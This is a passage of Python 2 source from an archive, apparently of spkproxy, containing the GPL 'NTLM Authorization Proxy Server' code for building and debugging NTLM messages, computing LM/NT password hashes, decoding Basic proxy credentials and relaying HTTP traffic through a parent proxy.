'Proxy-Authorization' l = connection.client_head_obj.get_param_values(value_name) user, password = '', '' for i in l: t = string.split(i)[0] if string.lower(t) == 'basic': b64 = string.split(i)[1] cred = base64.decodestring(b64) user = string.split(cred, ':')[0] password = string.split(cred, ':')[1] return user, password spkproxy/ntlm/ntlm_messages.py0100664000076500007650000003521007562544334015614 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import ntlm_procs, ntlmutils import base64, string #--------------------------------------------------------------------- class record: def __init__(self, data, offset=0): "" self.data = data self.len = len(data) self.offset = 0 self.next_offset = self.offset + self.len #--------------------------------------------------------------------- # helper function for creation info field in message 3 def create_record_info(self, offset): "" self.offset = offset len1 = ntlmutils.int2chrs(self.len) len2 = len1 data_off = ntlmutils.int2chrs(self.offset) self.record_info = len1 + len2 + data_off + '\000\000' # looks like the length is always = 8 bytes self.next_offset = offset + self.len #--------------------------------------------------------------------- def create_message1(environment_dict): "" ed = environment_dict # overall lenght = 48 bytes protocol = 'NTLMSSP\000' #name type = '\001\000' #type 1 zeros1 = '\000\000' flags = ntlmutils.hex2str(ed['FLAGS']) zeros2 = '\000\000\000\000\000\000\000\000\000' zeros3 = '\000\000\000\000\000\000\000\000\000\000\000' smthg1 = '0\000\000\000\000\000\000\000' # something with chr(48) length? smthg2 = '0\000\000\000' # something with chr(48) lenght? msg1 = protocol + type + zeros1 + flags + zeros2 + zeros3 + smthg1 + smthg2 msg1 = base64.encodestring(msg1) msg1 = string.replace(msg1, '\012', '') return msg1 #--------------------------------------------------------------------- def create_message3(nonce, environment_dict): "" ed = environment_dict flags = ntlmutils.hex2str(ed['FLAGS']) protocol = 'NTLMSSP\000' #name type = '\003\000' #type 3 head = protocol + type + '\000\000' domain_rec = record(ed['DOMAIN']) user_rec = record(ed['USER']) host_rec = record(ed['HOST']) additional_rec = record('') if ed['LM']: lm_rec = record(ntlm_procs.calc_resp(ed['LM_HASHED_PW'], nonce)) else: lm_rec = record('') if ed['NT']: nt_rec = record(ntlm_procs.calc_resp(ed['NT_HASHED_PW'], nonce)) else: nt_rec = record('') # length of the head and five infos for LM, NT, Domain, User, Host domain_offset = len(head) + 5 * 8 # and unknown record info and flags' lenght if ed['NTLM_MODE'] == 0: domain_offset = domain_offset + 8 + len(flags) # create info fields domain_rec.create_record_info(domain_offset) user_rec.create_record_info(domain_rec.next_offset) host_rec.create_record_info(user_rec.next_offset) lm_rec.create_record_info(host_rec.next_offset) nt_rec.create_record_info(lm_rec.next_offset) additional_rec.create_record_info(nt_rec.next_offset) # data part of the message 3 data_part = domain_rec.data + user_rec.data + host_rec.data + lm_rec.data + nt_rec.data # build message 3 m3 = head + lm_rec.record_info + nt_rec.record_info + domain_rec.record_info + \ user_rec.record_info + host_rec.record_info # Experimental feature !!! if ed['NTLM_MODE'] == 0: m3 = m3 + additional_rec.record_info + flags m3 = m3 + data_part # Experimental feature !!! if ed['NTLM_MODE'] == 0: m3 = m3 + additional_rec.data # base64 encode m3 = base64.encodestring(m3) m3 = string.replace(m3, '\012', '') return m3 #--------------------------------------------------------------------- def parse_message2(msg2): "" msg2 = base64.decodestring(msg2) # protocol = msg2[0:7] # msg_type = msg2[7:9] nonce = msg2[24:32] return nonce #--------------------------------------------------------------------- def item(item_str): "" item = {} res = '' item['len1'] = ntlmutils.bytes2int(item_str[0:2]) item['len2'] = ntlmutils.bytes2int(item_str[2:4]) item['offset'] = ntlmutils.bytes2int(item_str[4:6]) res = res + '%s\n\nlength (two times), offset, delimiter\n' % (ntlmutils.str2hex(item_str)) res = res + '%s decimal: %3d # length 1\n' % (ntlmutils.int2hex_str(item['len1']), item['len1']) res = res + '%s decimal: %3d # length 2\n' % (ntlmutils.int2hex_str(item['len2']), item['len2']) res = res + '%s decimal: %3d # offset\n' % (ntlmutils.int2hex_str(item['offset']), item['offset']) res = res + '%s # delimiter (two zeros)\n\n' % ntlmutils.str2hex(item_str[-2:]) item['string'] = res return item #--------------------------------------------------------------------- def flags(flag_str): "" res = '' res = res + '%s\n\n' % ntlmutils.str2hex(flag_str) flags = ntlmutils.bytes2int(flag_str[0:2]) res = res + '%s # flags\n' % (ntlmutils.int2hex_str(flags)) res = res + 'Binary:\nlayout 87654321 87654321\n' res = res + ' %s %s\n' % (ntlmutils.byte2bin_str(flag_str[1]), ntlmutils.byte2bin_str(flag_str[0])) flags2 = ntlmutils.bytes2int(flag_str[2:4]) res = res + '%s # more flags ???\n' % (ntlmutils.int2hex_str(flags2)) res = res + 'Binary:\nlayout 87654321 87654321\n' res = res + ' %s %s\n' % (ntlmutils.byte2bin_str(flag_str[3]), ntlmutils.byte2bin_str(flag_str[2])) #res = res + '%s # delimiter ???\n' % m_hex[(cur + 2) * 2: (cur + 4) * 2] return res #--------------------------------------------------------------------- def unknown_part(bin_str): "" res = '' res = res + 'Hex : %s\n' % ntlmutils.str2hex(bin_str, ' ') res = res + 'String : %s\n' % ntlmutils.str2prn_str(bin_str, ' ') res = res + 'Decimal: %s\n' % ntlmutils.str2dec(bin_str, ' ') return res #--------------------------------------------------------------------- def debug_message1(msg): "" m_ = base64.decodestring(msg) m_hex = ntlmutils.str2hex(m_) res = '' res = res + '==============================================================\n' res = res + 'NTLM Message 1 report:\n' res = res + '---------------------------------\n' res = res + 'Base64: %s\n' % msg res = res + 'String: %s\n' % ntlmutils.str2prn_str(m_) res = res + 'Hex: %s\n' % m_hex cur = 0 res = res + '---------------------------------\n' cur_len = 12 res = res + 'Header %d/%d:\n%s\n\n' % (cur, cur_len, m_hex[0:24]) res = res + '%s\nmethod name 0/8\n%s # C string\n\n' % (m_hex[0:16], ntlmutils.str2prn_str(m_[0:8])) res = res + '0x%s%s # message type\n' % (m_hex[18:20], m_hex[16:18]) res = res + '%s # delimiter (zeros)\n' % m_hex[20:24] cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 4 res = res + 'Flags %d/%d\n' % (cur, cur_len) res = res + flags(m_[cur: cur + cur_len]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = len(m_) - cur res = res + 'Rest of the message %d/%d:\n' % (cur, cur_len) res = res + unknown_part(m_[cur: cur + cur_len]) res = res + '\nEnd of message 1 report.\n' return res #--------------------------------------------------------------------- def debug_message2(msg): "" m_ = base64.decodestring(msg) m_hex = ntlmutils.str2hex(m_) res = '' res = res + '==============================================================\n' res = res + 'NTLM Message 2 report:\n' res = res + '---------------------------------\n' res = res + 'Base64: %s\n' % msg res = res + 'String: %s\n' % ntlmutils.str2prn_str(m_) res = res + 'Hex: %s\n' % m_hex cur = 0 res = res + '---------------------------------\n' cur_len = 12 res = res + 'Header %d/%d:\n%s\n\n' % (cur, cur_len, m_hex[0:24]) res = res + '%s\nmethod name 0/8\n%s # C string\n\n' % (m_hex[0:16], ntlmutils.str2prn_str(m_[0:8])) res = res + '0x%s%s # message type\n' % (m_hex[18:20], m_hex[16:18]) res = res + '%s # delimiter (zeros)\n' % m_hex[20:24] cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 8 res = res + 'Lengths and Positions %d/%d\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2]) cur_len = 8 res = res + 'Domain ??? %d/%d\n' % (cur, cur_len) dom = item(m_[cur:cur+cur_len]) res = res + dom['string'] cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 4 res = res + 'Flags %d/%d\n' % (cur, cur_len) res = res + flags(m_[cur: cur + cur_len]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 8 res = res + 'NONCE %d/%d\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = dom['offset'] - cur res = res + 'Unknown data %d/%d:\n' % (cur, cur_len) res = res + unknown_part(m_[cur: cur + cur_len]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = dom['len1'] res = res + 'Domain ??? %d/%d:\n' % (cur, cur_len) res = res + 'Hex: %s\n' % m_hex[cur * 2: (cur + cur_len) * 2] res = res + 'String: %s\n\n' % ntlmutils.str2prn_str(m_[cur : cur + cur_len]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = len(m_) - cur res = res + 'Rest of the message %d/%d:\n' % (cur, cur_len) res = res + unknown_part(m_[cur: cur + cur_len]) res = res + '\nEnd of message 2 report.\n' return res #--------------------------------------------------------------------- def debug_message3(msg): "" m_ = base64.decodestring(msg) m_hex = ntlmutils.str2hex(m_) res = '' res = res + '==============================================================\n' res = res + 'NTLM Message 3 report:\n' res = res + '---------------------------------\n' res = res + 'Base64: %s\n' % msg res = res + 'String: %s\n' % ntlmutils.str2prn_str(m_) res = res + 'Hex: %s\n' % m_hex cur = 0 res = res + '---------------------------------\n' cur_len = 12 res = res + 'Header %d/%d:\n%s\n\n' % (cur, cur_len, m_hex[0:24]) res = res + '%s\nmethod name 0/8\n%s # C string\n\n' % (m_hex[0:16], ntlmutils.str2prn_str(m_[0:8])) res = res + '0x%s%s # message type\n' % (m_hex[18:20], m_hex[16:18]) res = res + '%s # delimiter (zeros)\n' % m_hex[20:24] cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 48 res = res + 'Lengths and Positions %d/%d\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2]) cur_len = 8 res = res + 'LAN Manager response %d/%d\n' % (cur, cur_len) lmr = item(m_[cur:cur+cur_len]) res = res + lmr['string'] cur = cur + cur_len cur_len = 8 res = res + 'NT response %d/%d\n' % (cur, cur_len) ntr = item(m_[cur:cur+cur_len]) res = res + ntr['string'] cur = cur + cur_len cur_len = 8 res = res + 'Domain string %d/%d\n' % (cur, cur_len) dom = item(m_[cur:cur+cur_len]) res = res + dom['string'] cur = cur + cur_len cur_len = 8 res = res + 'User string %d/%d\n' % (cur, cur_len) user = item(m_[cur:cur+cur_len]) res = res + user['string'] cur = cur + cur_len cur_len = 8 res = res + 'Host string %d/%d\n' % (cur, cur_len) host = item(m_[cur:cur+cur_len]) res = res + host['string'] cur = cur + cur_len cur_len = 8 res = res + 'Unknow item record %d/%d\n' % (cur, cur_len) unknown = item(m_[cur:cur+cur_len]) res = res + unknown['string'] cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 4 res = res + 'Flags %d/%d\n' % (cur, cur_len) res = res + flags(m_[cur: cur + cur_len]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = dom['len1'] + user['len1'] + host['len1'] res = res + 'Domain, User, Host strings %d/%d\n%s\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2], ntlmutils.str2prn_str(m_[cur:cur + cur_len])) cur_len = dom['len1'] res = res + '%s\n' % m_hex[cur * 2: (cur + cur_len) * 2] res = res + 'Domain name %d/%d:\n' % (cur, cur_len) res = res + '%s\n\n' % (ntlmutils.str2prn_str(m_[cur: (cur + cur_len)])) cur = cur + cur_len cur_len = user['len1'] res = res + '%s\n' % m_hex[cur * 2: (cur + cur_len) * 2] res = res + 'User name %d/%d:\n' % (cur, cur_len) res = res + '%s\n\n' % (ntlmutils.str2prn_str(m_[cur: (cur + cur_len)])) cur = cur + cur_len cur_len = host['len1'] res = res + '%s\n' % m_hex[cur * 2: (cur + cur_len) * 2] res = res + 'Host name %d/%d:\n' % (cur, cur_len) res = res + '%s\n\n' % (ntlmutils.str2prn_str(m_[cur: (cur + cur_len)])) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = lmr['len1'] res = res + 'LAN Manager response %d/%d\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = ntr['len1'] res = res + 'NT response %d/%d\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = len(m_) - cur res = res + 'Rest of the message %d/%d:\n' % (cur, cur_len) res = res + unknown_part(m_[cur: cur + cur_len]) res = res + '\nEnd of message 3 report.\n' return res spkproxy/ntlm/ntlm_procs.py0100664000076500007650000000526407562544425015142 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import string import des, md4, ntlmutils #--------------------------------------------------------------------- #takes a 21 byte array and treats it as 3 56-bit DES keys. The #8 byte plaintext is encrypted with each key and the resulting 24 #bytes are stored in the result array def calc_resp(keys_str, plain_text): "keys_str - hashed password" "plain_text - nonce from server" res = '' dobj = des.DES(keys_str[0:7]) res = res + dobj.encrypt(plain_text[0:8]) dobj = des.DES(keys_str[7:14]) res = res + dobj.encrypt(plain_text[0:8]) dobj = des.DES(keys_str[14:21]) res = res + dobj.encrypt(plain_text[0:8]) return res #--------------------------------------------------------------------- def create_LM_hashed_password(passwd): "setup LanManager password" "create LanManager hashed password" lm_pw = '\000' * 14 passwd = string.upper(passwd) if len(passwd) < 14: lm_pw = passwd + lm_pw[len(passwd) - 14:] else: lm_pw = passwd[0:14] # do hash magic_lst = [0x4B, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25] magic_str = ntlmutils.lst2str(magic_lst) res = '' dobj = des.DES(lm_pw[0:7]) res = res + dobj.encrypt(magic_str) dobj = des.DES(lm_pw[7:14]) res = res + dobj.encrypt(magic_str) # addig zeros to get 21 bytes string res = res + '\000\000\000\000\000' return res #--------------------------------------------------------------------- def create_NT_hashed_password(passwd): "create NT hashed password" # we have to have UNICODE password pw = ntlmutils.str2unicode(passwd) # do MD4 hash md4_context = md4.new() md4_context.update(pw) res = md4_context.digest() # addig zeros to get 21 bytes string res = res + '\000\000\000\000\000' return res spkproxy/ntlm/proxy_client.py0100664000076500007650000007531507562540467015507 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import string, socket, thread, select, time import logger, http_header, utils import ntlm_auth, basic_auth class proxy_HTTP_Client: "" #----------------------------------------------------------------------- def __init__(self, client_socket, address, config): "" self.config = config self.ntlm_auther = ntlm_auth.ntlm_auther() # experimental code self.basic_auther = basic_auth.basic_auther() # experimental code end self.proxy_authorization_tried = 0 self.www_authorization_tried = 0 self.tunnel_mode = 0 # define log files self.logger_bin_client = logger.Logger('%s-%d.bin.client' % address, self.config['DEBUG']['BIN_DEBUG']) self.logger_bin_rserver = logger.Logger('%s-%d.bin.rserver' % address, self.config['DEBUG']['BIN_DEBUG']) self.logger_auth = logger.Logger('%s-%d.auth' % address, self.config['DEBUG']['AUTH_DEBUG']) self.logger = logger.Logger('%s-%d' % address, self.config['DEBUG']['DEBUG']) # set it to 1 till we will connect actually??? # No!!! In that case we have unexpected exit if the client sends its header slow. self.rserver_socket_closed = 1 # Yes ! # This is a flag that means that we have not tried connecting to # the remote host. And self.rserver_socket_closed = 1 is not requiring # to finish thread. # Do not like this solution. self.first_run = 1 self.client_socket_closed = 0 self.stop_request = 0 # must finish thread self.current_rserver_net_location = '' self.rserver_socket = None self.client_socket = client_socket self.client_address = address self.rserver_head_obj = None self.rserver_current_data_pos =0 self.rserver_all_got = 0 self.rserver_data_length = 0 self.rserver_header_sent = 0 self.rserver_data_sent = 0 self.rserver_buffer = '' self.client_head_obj = None self.client_current_data_pos =0 self.client_all_got = 0 self.client_data_length = 0 self.client_header_sent = 0 self.client_data_sent = 0 self.client_buffer = '' self.client_sent_data = '' # init record to debug_log self.logger.log('%s Version %s\n' % (time.strftime('%d.%m.%Y %H:%M:%S', time.localtime(time.time())), self.config['GENERAL']['VERSION'])) #----------------------------------------------------------------------- def run(self): "" if self.config['DEBUG']['SCR_DEBUG']: print 'Connected from %s:%d' % self.client_address while(not self.stop_request): # wait for data if not (self.rserver_buffer or self.client_buffer): # if buffers are empty """ if not self.rserver_socket_closed: select.select([self.rserver_socket.fileno(), self.client_socket.fileno()], [], [], 5.0) else: # if there is no connection to remote server select.select([self.client_socket.fileno()], [], [], 5.0) """ # Experimental code. We fight bug when we do not get all the header in the # first try and have stop request because rserver_socket_closed==1 # So let's try change socket_closed to socket. which is None if there is no # connection if not self.rserver_socket_closed: select.select([self.rserver_socket.fileno(), self.client_socket.fileno()], [], [], 5.0) else: # if there is no connection to remote server select.select([self.client_socket.fileno()], [], [], 5.0) # client part self.run_client_loop() if self.tunnel_mode: self.tunnel_client_data() if not self.client_header_sent and self.client_head_obj: if not self.rserver_socket_closed: # if connected we have to check whether we are connected to the right host. # if not then close connection self.check_connected_remote_server() #if self.rserver_socket_closed: if self.rserver_socket_closed: # connect remote server if we have not yet self.connect_rserver() self.log_url() self.send_client_header() if self.client_header_sent and (not self.client_data_sent): self.send_client_data() if self.client_data_sent and self.rserver_data_sent: # NOTE: we need to know if the request method is HEAD or CONNECT, so we cannot # proceed to the next request header until response is not worked out self.check_tunnel_mode() self.reset_client() if self.config['DEBUG']['SCR_DEBUG']: print '\b.', # Remote server part if not self.rserver_socket_closed: # if there is a connection to remote server self.run_rserver_loop() if self.tunnel_mode: self.tunnel_rserver_data() if (not self.rserver_header_sent) and self.rserver_head_obj: self.auth_routine() # NTLM authorization if (not self.rserver_header_sent) and self.rserver_head_obj: self.send_rserver_header() self.check_rserver_response() if self.rserver_header_sent and (not self.rserver_data_sent): self.send_rserver_data() if self.client_head_obj == None and self.rserver_data_sent: self.reset_rserver() self.logger.log('*** Request completed.\n') self.check_stop_request() self.exit() if self.config['DEBUG']['SCR_DEBUG']: print 'Finished %s:%d' % self.client_address #----------------------------------------------------------------------- def fix_client_header(self): "" self.logger.log('*** Replacing values in client header...') if self.config.has_key('CLIENT_HEADER'): for i in self.config['CLIENT_HEADER'].keys(): self.client_head_obj.del_param(i) self.client_head_obj.add_param_value(i, self.config['CLIENT_HEADER'][i]) self.logger.log('Done.\n') self.logger.log('*** New client header:\n=====\n' + self.client_head_obj.__repr__()) else: self.logger.log('No need.\n*** There is no "CLIENT_HEADER" section in server.cfg.\n') #----------------------------------------------------------------------- def run_rserver_loop(self): "" res = select.select([self.rserver_socket.fileno()], [], [], 0.0) if res[0]: try: socket_data = self.rserver_socket.recv(4096) except: socket_data = '' self.logger.log('*** Exception in remote server recv() happend.\n') if not socket_data: self.rserver_socket_closed = 1 self.logger.log('*** Remote server closed connection. (Server buffer - %d bytes)\n' % len(self.rserver_buffer)) else: socket_data = '' if socket_data: self.logger_bin_rserver.log(socket_data) self.rserver_buffer = self.rserver_buffer + socket_data if not self.rserver_head_obj and not self.tunnel_mode: self.rserver_head_obj, rest = http_header.extract_server_header(self.rserver_buffer) # Code for ugly MS response without right delimiter. # Just '\015\012' at the end. Then it closes connection. if self.rserver_socket_closed and self.rserver_buffer and (not self.rserver_head_obj): self.rserver_head_obj, rest = http_header.extract_server_header(self.rserver_buffer + '\015\012') if self.rserver_head_obj: self.logger.log("*** There is an bad MS Proxy response header with only one new line at the end in the buffer.\n") # End of code. if self.rserver_head_obj: self.logger.log("*** Got remote server response header.\n") self.rserver_buffer = rest self.logger.log('*** Remote server header:\n=====\n' + self.rserver_head_obj.__repr__()) self.guess_rserver_data_length() self.check_rserver_data_length() #----------------------------------------------------------------------- def run_client_loop(self): "" res = select.select([self.client_socket.fileno()], [], [], 0.0) if res[0]: try: socket_data = self.client_socket.recv(4096) except: socket_data = '' self.logger.log('*** Exception in client recv() happend.\n') if not socket_data: self.client_socket_closed = 1 self.logger.log('*** Client closed connection.\n') else: socket_data = '' if socket_data: self.logger_bin_client.log(socket_data) self.client_buffer = self.client_buffer + socket_data if not self.client_head_obj and not self.tunnel_mode: self.client_head_obj, rest = http_header.extract_client_header(self.client_buffer) if self.client_head_obj: self.logger.log("*** Got client request header.\n") self.client_buffer = rest self.logger.log('*** Client header:\n=====\n' + self.client_head_obj.__repr__()) self.guess_client_data_length() # mask real values and do transforms self.fix_client_header() self.check_client_data_length() #----------------------------------------------------------------------- def send_rserver_header(self): "" self.logger.log('*** Sending remote server response header to client...') ok = self.rserver_head_obj.send(self.client_socket) if ok: self.rserver_header_sent = 1 self.logger.log('Done.\n') else: self.client_socket_closed = 1 self.logger.log('Failed.\n') #----------------------------------------------------------------------- def send_rserver_data(self): "" if self.rserver_buffer and (not self.rserver_data_sent): if self.rserver_data_length: if self.rserver_all_got: data = self.rserver_buffer[:self.rserver_data_length - self.rserver_current_data_pos] self.rserver_buffer = self.rserver_buffer[self.rserver_data_length - self.rserver_current_data_pos:] else: data = self.rserver_buffer self.rserver_buffer = '' self.rserver_current_data_pos = self.rserver_current_data_pos + len(data) else: data = self.rserver_buffer self.rserver_buffer = '' try: self.client_socket.send(data) self.logger.log('*** Sent %d bytes to client. (all - %d, len - %d)\n' % (len(data), self.rserver_all_got, self.rserver_data_length)) if self.rserver_all_got: self.rserver_data_sent = 1 self.logger.log('*** Sent ALL the data from remote server to client. (Server buffer - %d bytes)\n' % len(self.rserver_buffer)) except: self.logger.log('*** Exception by sending data to client. Client closed connection.\n') self.client_socket_closed = 1 else: self.logger.log("*** No server's data to send to the client. (server's buffer - %d bytes)\n" % len(self.rserver_buffer)) #----------------------------------------------------------------------- def send_client_header(self): "" self.logger.log('*** Sending client request header to remote server...') ok = self.client_head_obj.send(self.rserver_socket) if ok: self.client_header_sent = 1 self.logger.log('Done.\n') else: self.rserver_socket_closed = 1 self.logger.log('Failed.\n') #----------------------------------------------------------------------- def send_client_data(self): "" if self.client_buffer and (not self.client_data_sent): if self.client_data_length: if self.client_all_got: data = self.client_buffer[:self.client_data_length - self.client_current_data_pos] self.client_buffer = self.client_buffer[self.client_data_length - self.client_current_data_pos:] else: data = self.client_buffer self.client_buffer = '' self.client_current_data_pos = self.client_current_data_pos + len(data) else: data = self.client_buffer self.client_buffer = '' try: self.rserver_socket.send(data) self.client_sent_data = self.client_sent_data + data self.logger.log('*** Sent %d bytes to remote server. (all - %d)\n' % (len(data), self.client_all_got)) if self.client_all_got: self.client_data_sent = 1 self.logger.log('*** Sent ALL the data from client to remote server. (Client buffer - %d bytes)\n' % len(self.client_buffer)) except: self.logger.log('*** Exception during sending data to remote server. Remote server closed connection.\n') self.rserver_socket_closed = 1 #----------------------------------------------------------------------- def reset_rserver(self): "" self.logger.log('*** Resetting remote server status...') self.rserver_head_obj = None self.rserver_current_data_pos =0 self.rserver_all_got = 0 self.rserver_data_length = 0 self.rserver_header_sent = 0 self.rserver_data_sent = 0 #self.rserver_buffer = '' self.logger.log('Done. (Server buffer - %d bytes)\n' % len(self.rserver_buffer)) #----------------------------------------------------------------------- def reset_client(self): "" self.logger.log('*** Resetting client status...') self.client_head_obj = None self.client_current_data_pos =0 self.client_all_got = 0 self.client_data_length = 0 self.client_header_sent = 0 self.client_data_sent = 0 #self.client_buffer = '' self.client_sent_data = '' self.logger.log('Done. (Client buffer - %d bytes)\n' % len(self.client_buffer)) #----------------------------------------------------------------------- def rollback_client_data(self): "" # some activity for POST and PUT getting to work with authorization # part of data might be sent before we have got 407 error # so we have to get those data back if self.client_sent_data: self.logger.log("*** Sent %s bytes and have to roll back POST/PUT data transfer. (Client's buffer - %d bytes)\n" % (len(self.client_sent_data), len(self.client_buffer))) self.client_buffer = self.client_sent_data + self.client_buffer self.client_current_data_pos =0 self.client_all_got = 0 self.client_data_sent = 0 self.client_sent_data = '' self.logger.log("Rollback Done. (Client's buffer - %d bytes)\n" % len(self.client_buffer)) #----------------------------------------------------------------------- def tunnel_rserver_data(self): "" if self.rserver_buffer: data = self.rserver_buffer self.rserver_buffer = '' try: self.client_socket.send(data) self.logger.log('*** Tunnelled %d bytes to client.\n' % len(data)) except: self.logger.log('*** Exception by tunnelling data to client. Client closed connection.\n') self.client_socket_closed = 1 #----------------------------------------------------------------------- def tunnel_client_data(self): "" if self.client_buffer: data = self.client_buffer self.client_buffer = '' try: self.rserver_socket.send(data) self.logger.log('*** Tunnelled %d bytes to remote server.\n' % len(data)) except: self.logger.log('*** Exception by tunnelling data to remote server. Remote server closed connection.\n') self.rserver_socket_closed = 1 #----------------------------------------------------------------------- def guess_rserver_data_length(self): "" code = self.rserver_head_obj.get_http_code() c_method = self.client_head_obj.get_http_method() if code == '304' or code == '204' or code[0] == '1': self.rserver_all_got = 1 self.rserver_data_sent = 1 self.rserver_data_length = 0 self.logger.log('*** Remote server response is %s and it must not have any body.\n' % code) # we had problem here if the responce was some kind of error. Then there may be # some body. # This time let's try to check for 4** responses to fix the problem. if (c_method == 'HEAD' or c_method == 'CONNECT') and (code[0] != '4'): self.rserver_all_got = 1 self.rserver_data_sent = 1 self.rserver_data_length = 0 self.logger.log("*** Remote server response to the '%s' request. It must not have any body.\n" % c_method) if not self.rserver_all_got: try: self.rserver_data_length = int(self.rserver_head_obj.get_param_values('Content-Length')[0]) self.logger.log("*** Server 'Content-Length' found to be %d.\n" % self.rserver_data_length) if self.rserver_data_length == 0: self.rserver_all_got = 1 self.rserver_data_sent = 1 except: self.rserver_data_length = 0 self.logger.log("*** Could not find server 'Content-Length' parameter.\n") #----------------------------------------------------------------------- def guess_client_data_length(self): "" if not self.client_head_obj.has_param('Content-Length') and not self.client_head_obj.has_param('Transfer-Encode'): self.client_all_got = 1 self.client_data_sent = 1 self.client_data_length = 0 self.logger.log("*** Client request header does not have 'Content-Length' or 'Transfer-Encoding' parameter and it must not have any body.\n") if not self.client_all_got: try: self.client_data_length = int(self.client_head_obj.get_param_values('Content-Length')[0]) self.logger.log("*** Client 'Content-Length' found to be %s.\n" % self.client_data_length) if self.client_data_length == 0: self.client_all_got = 1 self.client_data_sent = 1 except: self.client_data_length = 0 self.logger.log("*** Could not find client 'Content-Length' parameter.\n") #----------------------------------------------------------------------- def check_rserver_data_length(self): "" if self.rserver_data_length: if self.rserver_data_length <= (len(self.rserver_buffer) + self.rserver_current_data_pos): self.rserver_all_got = 1 #----------------------------------------------------------------------- def check_client_data_length(self): "" if self.client_data_length: if self.client_data_length <= (len(self.client_buffer) + self.client_current_data_pos): self.client_all_got = 1 #----------------------------------------------------------------------- def check_tunnel_mode(self): "" p_code = self.rserver_head_obj.get_http_code() c_request = self.client_head_obj.get_http_method() if c_request == 'CONNECT' and p_code == '200': self.logger.log("*** Successful 'CONNECT' request detected. Going to tunnel mode.\n") self.tunnel_mode = 1 #----------------------------------------------------------------------- def log_url(self): "" if self.config['GENERAL']['URL_LOG']: t = time.strftime('%d.%m.%Y %H:%M:%S', time.localtime(time.time())) m = self.client_head_obj.get_http_method() url = self.client_head_obj.get_http_url() v = self.client_head_obj.get_http_version() p1 = '%s %s %s %s ' % (t, m, url, v) p2 = '(from %s:%s)' % self.client_address self.config['GENERAL']['URL_LOG_LOCK'].acquire() self.config['GENERAL']['URL_LOGGER'].log(p1 + p2 + '\n') self.config['GENERAL']['URL_LOG_LOCK'].release() #----------------------------------------------------------------------- def check_stop_request(self): "" reason = '' if self.rserver_socket_closed and not self.first_run: self.stop_request = 1 reason = "remote server closed connection" if self.rserver_head_obj: # if we POSTing or PUTting some info and Proxy closed connection # with error 407, we would like to try to authorize ourselves before giving up. if (not self.proxy_authorization_tried) and self.rserver_head_obj.get_http_code() == '407': self.stop_request = 0 if (not self.www_authorization_tried) and self.rserver_head_obj.get_http_code() == '401': self.stop_request = 0 if self.client_socket_closed: self.stop_request = 1 reason = "client closed connection" if self.rserver_socket_closed and self.client_socket_closed: # actually redundant case, but anyway... self.stop_request = 1 reason = "remote server and client closed connections" if self.stop_request: self.logger.log("*** Termination conditions detected (%s). Stop Request issued.\n" % reason) #----------------------------------------------------------------------- def exit(self): "" self.logger.log('*** Finishing procedure started.\n') if self.rserver_socket_closed and self.rserver_buffer and (not self.client_socket_closed): self.logger.log('*** There are some data to be sent to client in the remote server buffer.\n') self.tunnel_rserver_data() if self.client_socket_closed and self.client_buffer and (not self.rserver_socket_closed): self.logger.log('*** There are some data to be sent to remote server in the client buffer.\n') self.tunnel_client_data() self.logger.log('*** Closing thread...') if self.client_socket: self.client_socket.close() if self.rserver_socket: self.rserver_socket.close() self.logger.log('Done.\n') # thread.exit() #------------------------------------------------- def connect_rserver(self): "" self.logger.log('*** Connecting to remote server...') self.first_run = 0 rs = self.config['GENERAL']['PARENT_PROXY'] rsp = self.config['GENERAL']['PARENT_PROXY_PORT'] self.logger.log('(%s:%d)...' % (rs, rsp)) try: s = socket.socket(socket.AF_INET, 